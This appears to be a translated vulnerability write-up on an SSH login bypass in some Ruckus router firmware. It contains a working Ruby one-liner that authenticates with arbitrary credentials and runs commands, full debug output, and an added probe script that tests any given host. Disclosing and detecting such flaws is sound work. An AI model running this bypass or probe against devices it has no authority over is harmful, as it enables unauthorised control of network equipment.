Analysis of a Suspected Backdoor in Ruckus Router (优科路由器)

waynewong  3279 days ago

1. Overview

Recently, while analysing the NetScreen backdoor, the NoSec (白帽汇) security team incidentally found that a certain version of the Ruckus Router also exhibits suspected backdoor behaviour: commands can be executed directly over SSH without any account. So far, at least several hundred devices reachable from the Internet have been found to be affected.

Versions confirmed affected so far include 4.1.0.96 and 4.2.0.0.132; we are not yet certain whether this is a previously known issue.

2. Technical analysis

Normally, connecting to the device over SSH prompts for a username and password, for example:

$ ssh 8.40.x.x

Please login: admin
password : 
Login incorrect

Please login:

We used net-ssh under Ruby to drive the SSH protocol and print its debug output:

$ irb
2.1.5 :233 > require 'net/ssh'
2.1.5 :233 > Net::SSH.start('8.40.x.x', 'any', :password => %q|anychar|,:verbose=>:debug,:auth_methods => ["password"]) do |ssh|; puts ssh.exec!("get version"); end

D, [2015-12-24T13:36:52.577626 #6230] DEBUG -- net.ssh.transport.session[3fc639464fa8]: establishing connection to 8.40.x.x:22

D, [2015-12-24T13:36:52.935203 #6230] DEBUG -- net.ssh.transport.session[3fc639464fa8]: connection established

I, [2015-12-24T13:36:52.935285 #6230]  INFO -- net.ssh.transport.server_version[3fc6390b5ba0]: negotiating protocol version

D, [2015-12-24T13:36:53.342534 #6230] DEBUG -- net.ssh.transport.server_version[3fc6390b5ba0]: remote is `SSH-2.0-dropbear_0.48'

D, [2015-12-24T13:36:53.342590 #6230] DEBUG -- net.ssh.transport.server_version[3fc6390b5ba0]: local is `SSH-2.0-Ruby/Net::SSH_3.0.1 x86_64-darwin14.0'

D, [2015-12-24T13:36:53.756625 #6230] DEBUG -- socket[3fc6394645f8]: read 344 bytes

D, [2015-12-24T13:36:53.756732 #6230] DEBUG -- socket[3fc6394645f8]: received packet nr 0 type 20 len 340

I, [2015-12-24T13:36:53.756796 #6230]  INFO -- net.ssh.transport.algorithms[3fc6390b4598]: got KEXINIT from server

I, [2015-12-24T13:36:53.756848 #6230]  INFO -- net.ssh.transport.algorithms[3fc6390b4598]: sending KEXINIT

D, [2015-12-24T13:36:53.757020 #6230] DEBUG -- socket[3fc6394645f8]: queueing packet nr 0 type 20 len 1684

D, [2015-12-24T13:36:53.757140 #6230] DEBUG -- socket[3fc6394645f8]: sent 1688 bytes

I, [2015-12-24T13:36:53.757176 #6230]  INFO -- net.ssh.transport.algorithms[3fc6390b4598]: negotiating algorithms

D, [2015-12-24T13:36:53.757274 #6230] DEBUG -- net.ssh.transport.algorithms[3fc6390b4598]: negotiated:

* kex: diffie-hellman-group1-sha1

* host_key: ssh-rsa

* encryption_server: aes128-cbc

* encryption_client: aes128-cbc

* hmac_client: hmac-sha1

* hmac_server: hmac-sha1

* compression_client: none

* compression_server: none

* language_client: 

* language_server: 

D, [2015-12-24T13:36:53.757299 #6230] DEBUG -- net.ssh.transport.algorithms[3fc6390b4598]: exchanging keys

D, [2015-12-24T13:36:53.757886 #6230] DEBUG -- socket[3fc6394645f8]: queueing packet nr 1 type 30 len 140

D, [2015-12-24T13:36:53.757930 #6230] DEBUG -- socket[3fc6394645f8]: sent 144 bytes

D, [2015-12-24T13:36:57.345886 #6230] DEBUG -- socket[3fc6394645f8]: read 720 bytes

D, [2015-12-24T13:36:57.346065 #6230] DEBUG -- socket[3fc6394645f8]: received packet nr 1 type 31 len 700

D, [2015-12-24T13:36:57.415697 #6230] DEBUG -- socket[3fc6394645f8]: queueing packet nr 2 type 21 len 20

D, [2015-12-24T13:36:57.415823 #6230] DEBUG -- socket[3fc6394645f8]: sent 24 bytes

D, [2015-12-24T13:36:57.416003 #6230] DEBUG -- socket[3fc6394645f8]: received packet nr 2 type 21 len 12

D, [2015-12-24T13:36:57.416275 #6230] DEBUG -- net.ssh.authentication.session[3fc6388b4078]: beginning authentication of `any'

D, [2015-12-24T13:36:57.416374 #6230] DEBUG -- socket[3fc6394645f8]: queueing packet nr 3 type 5 len 28

D, [2015-12-24T13:36:57.416431 #6230] DEBUG -- socket[3fc6394645f8]: sent 52 bytes

D, [2015-12-24T13:36:58.155451 #6230] DEBUG -- socket[3fc6394645f8]: read 52 bytes

D, [2015-12-24T13:36:58.155590 #6230] DEBUG -- socket[3fc6394645f8]: received packet nr 3 type 6 len 28

D, [2015-12-24T13:36:58.155742 #6230] DEBUG -- net.ssh.authentication.session[3fc6388b4078]: trying password

D, [2015-12-24T13:36:58.155889 #6230] DEBUG -- socket[3fc6394645f8]: queueing packet nr 4 type 50 len 60

D, [2015-12-24T13:36:58.155950 #6230] DEBUG -- socket[3fc6394645f8]: sent 84 bytes

D, [2015-12-24T13:36:58.490987 #6230] DEBUG -- socket[3fc6394645f8]: read 36 bytes

D, [2015-12-24T13:36:58.491177 #6230] DEBUG -- socket[3fc6394645f8]: received packet nr 4 type 52 len 12

D, [2015-12-24T13:36:58.491277 #6230] DEBUG -- net.ssh.authentication.methods.password[3fc6388b3ee8]: password succeeded

D, [2015-12-24T13:36:58.491429 #6230] DEBUG -- socket[3fc6394645f8]: queueing packet nr 5 type 90 len 44

D, [2015-12-24T13:36:58.491552 #6230] DEBUG -- socket[3fc6394645f8]: sent 68 bytes

D, [2015-12-24T13:36:58.876109 #6230] DEBUG -- socket[3fc6394645f8]: read 52 bytes

D, [2015-12-24T13:36:58.876301 #6230] DEBUG -- socket[3fc6394645f8]: received packet nr 5 type 91 len 28

I, [2015-12-24T13:36:58.876449 #6230]  INFO -- net.ssh.connection.session[3fc6388b29a8]: channel_open_confirmation: 0 0 8000 8000

I, [2015-12-24T13:36:58.876648 #6230]  INFO -- net.ssh.connection.channel[3fc6388b2840]: sending channel request "env"

D, [2015-12-24T13:36:58.876769 #6230] DEBUG -- socket[3fc6394645f8]: queueing packet nr 6 type 98 len 44

I, [2015-12-24T13:36:58.876924 #6230]  INFO -- net.ssh.connection.channel[3fc6388b2840]: sending channel request "exec"

D, [2015-12-24T13:36:58.877018 #6230] DEBUG -- socket[3fc6394645f8]: queueing packet nr 7 type 98 len 44

D, [2015-12-24T13:36:58.877221 #6230] DEBUG -- socket[3fc6394645f8]: sent 136 bytes

D, [2015-12-24T13:36:59.291831 #6230] DEBUG -- socket[3fc6394645f8]: read 36 bytes

D, [2015-12-24T13:36:59.292027 #6230] DEBUG -- socket[3fc6394645f8]: received packet nr 6 type 99 len 12

I, [2015-12-24T13:36:59.292122 #6230]  INFO -- net.ssh.connection.session[3fc6388b29a8]: channel_success: 0

D, [2015-12-24T13:36:59.296051 #6230] DEBUG -- socket[3fc6394645f8]: read 84 bytes

D, [2015-12-24T13:36:59.296180 #6230] DEBUG -- socket[3fc6394645f8]: received packet nr 7 type 94 len 60

I, [2015-12-24T13:36:59.296248 #6230]  INFO -- net.ssh.connection.session[3fc6388b29a8]: channel_data: 0 35b

D, [2015-12-24T13:36:59.691776 #6230] DEBUG -- socket[3fc6394645f8]: read 140 bytes

D, [2015-12-24T13:36:59.691968 #6230] DEBUG -- socket[3fc6394645f8]: received packet nr 8 type 96 len 12

I, [2015-12-24T13:36:59.692040 #6230]  INFO -- net.ssh.connection.session[3fc6388b29a8]: channel_eof: 0

D, [2015-12-24T13:36:59.692225 #6230] DEBUG -- socket[3fc6394645f8]: received packet nr 9 type 98 len 44

I, [2015-12-24T13:36:59.692342 #6230]  INFO -- net.ssh.connection.session[3fc6388b29a8]: channel_request: 0 exit-status false

D, [2015-12-24T13:36:59.692477 #6230] DEBUG -- socket[3fc6394645f8]: received packet nr 10 type 97 len 12

I, [2015-12-24T13:36:59.692523 #6230]  INFO -- net.ssh.connection.session[3fc6388b29a8]: channel_close: 0

D, [2015-12-24T13:36:59.692613 #6230] DEBUG -- socket[3fc6394645f8]: queueing packet nr 8 type 97 len 28

Ruckus Router

Version: 4.2.0.0.132

I, [2015-12-24T13:36:59.692674 #6230]  INFO -- net.ssh.connection.session[3fc6388b29a8]: closing remaining channels (0 open)

 => nil 

2.1.5 :234 > 

In the test above, we supplied an arbitrary username and an arbitrary password together with the command we wanted to run (here `get version`), and were able to bypass the login check and execute the command directly. The debug output makes the point concrete: the device identifies itself as `SSH-2.0-dropbear_0.48`, the very first password attempt for user `any` with password `anychar` is answered with `password succeeded` (SSH_MSG_USERAUTH_SUCCESS), and the exec channel that follows returns the device banner and version. The flaw is therefore in authentication itself, not in some unprivileged shell: whatever the server accepts after that point runs with the rights of the SSH login.
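A practitioner who wants to check their own devices for this behaviour needs a probe that does two things the irb one-liner above does not: it must use genuinely random credentials, so that a device that merely still has vendor default credentials is not mistaken for one with an authentication bypass, and it must distinguish "credentials accepted" from "the device actually answered `get version`". The following Ruby script is an added example and not code from the original post or from Ruckus. It assumes the net-ssh gem version 5 or later (older releases spell the host-key option differently), and SAMPLE_OUTPUT is a constructed stand-in for the banner the post's device returned, used only to exercise the offline helpers.

```ruby
require 'securerandom'
require 'timeout'

# Constructed stand-in for the `get version` output shown in the post (not a live capture).
SAMPLE_OUTPUT = "Ruckus Router\n\nVersion: 4.2.0.0.132\n".freeze

# Versions the post reports as affected.
AFFECTED_VERSIONS = %w[4.1.0.96 4.2.0.0.132].freeze

# Pull the product line and version string out of `get version` output.
# Returns nil when the text does not look like a Ruckus version banner.
def parse_get_version(output)
  return nil unless output.is_a?(String)
  m = output.match(/^Version:\s*([\d.]+)/)
  return nil unless m
  { product: output.lines.first.to_s.strip, version: m[1] }
end

def affected_version?(version)
  AFFECTED_VERSIONS.include?(version)
end

# Turn an authentication outcome plus command output into a verdict.
#   :bypass        - random credentials accepted and the device answered `get version`
#   :accepted_only - credentials accepted but output not recognised; review by hand
#   :rejected      - normal behaviour, authentication failed
def classify(accepted, output)
  return :rejected unless accepted
  parse_get_version(output) ? :bypass : :accepted_only
end

# Live probe against one host. Random credentials avoid false positives from
# default accounts; legacy algorithms are offered explicitly because the post's
# device negotiated dh-group1/ssh-rsa/aes128-cbc, which modern net-ssh no longer
# includes in its defaults.
def probe_anonymous_exec(host, port: 22, timeout: 10)
  require 'net/ssh' # loaded here so the offline helpers above work without the gem
  user = "u#{SecureRandom.hex(4)}"
  pass = SecureRandom.hex(8)
  opts = {
    port: port, password: pass, auth_methods: ['password'], non_interactive: true,
    timeout: timeout, verify_host_key: :never,
    kex: ['diffie-hellman-group1-sha1'], host_key: ['ssh-rsa'],
    encryption: ['aes128-cbc'], hmac: ['hmac-sha1']
  }
  begin
    out = Net::SSH.start(host, user, opts) { |ssh| ssh.exec!('get version') }.to_s
    info = parse_get_version(out)
    { host: host, verdict: classify(true, out), user: user,
      version: info && info[:version],
      affected_version: info ? affected_version?(info[:version]) : nil,
      output: out }
  rescue Net::SSH::AuthenticationFailed
    { host: host, verdict: classify(false, nil) }
  rescue Net::SSH::Exception, SystemCallError, SocketError, Timeout::Error => e
    { host: host, verdict: :error, reason: "#{e.class}: #{e.message}" }
  end
end

# Command-line use: ruby probe.rb HOST [PORT]
if $PROGRAM_NAME == __FILE__ && !ARGV.empty?
  p probe_anonymous_exec(ARGV[0], port: (ARGV[1] || 22).to_i)
end
```

Run it as `ruby probe.rb 8.40.x.x`; a verdict of `:bypass` with `affected_version: true` reproduces the post's finding, while `:accepted_only` means the login was accepted but the device did not answer `get version` in the expected form and deserves a manual look. Because the credentials are generated per run, a `:rejected` result on a device with default credentials still intact is the correct answer for this particular flaw, even though that device has its own problem.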

Latest comments

secbook:
3275 days ago
leir_: What about other commands?
3275 days ago
greenboy: Can you share an address **?
3275 days ago
LubyRuffy:
3275 days ago